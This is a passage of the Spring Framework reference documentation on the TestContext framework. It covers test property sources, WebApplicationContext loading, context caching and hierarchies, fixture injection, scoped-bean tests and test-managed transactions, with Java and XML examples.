__shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. `ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that are used to load it. Consequently, the unique combination\nof configuration parameters are used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ++ApplicationContext++s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nAs of Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit-based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. The result is\nthat three application contexts will be loaded (one for each declaration of\n`@ContextConfiguration`), and the application context loaded based on the configuration\nin `AbstractWebTests` will be set as the parent context for each of the contexts loaded\nfor the concrete subclasses.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/applicationContext.xml\")\n\tpublic abstract class AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/soap-ws-config.xml\")\n\tpublic class SoapWebServiceTests extends AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/rest-ws-config.xml\")\n\tpublic class RestWebServiceTests extends AbstractWebTests {}\n----\n--\n\n\n.Class hierarchy with merged context hierarchy configuration\n--\nThe following classes demonstrate the use of __named__ hierarchy levels in order to\n__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`\ndefines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends\n`BaseTests` and instructs the Spring TestContext Framework to merge the context\nconfiguration for the `child` hierarchy level, simply by ensuring that the names\ndeclared via the `name` attribute in `@ContextConfiguration` are both `\"child\"`. The\nresult is that three application contexts will be loaded: one for `\"\/app-config.xml\"`,\none for `\"\/user-config.xml\"`, and one for `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\nAs with the previous example, the application context loaded from `\"\/app-config.xml\"`\nwill be set as the parent context for the contexts loaded from `\"\/user-config.xml\"`\nand `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/order-config.xml\")\n\t)\n\tpublic class ExtendedTests extends BaseTests {}\n----\n--\n\n.Class hierarchy with overridden context hierarchy configuration\n--\nIn contrast to the previous example, this example demonstrates how to __override__ the\nconfiguration for a given named level in a context hierarchy by setting the\n`inheritLocations` flag in `@ContextConfiguration` to `false`. Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit. The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit-based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring for several years now, but it's always been a bit non-trivial to test them. As of\nSpring 3.2 it's a breeze to test your request-scoped and session-scoped beans by\nfollowing these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia the `@Commit` and `@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nAs of Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be 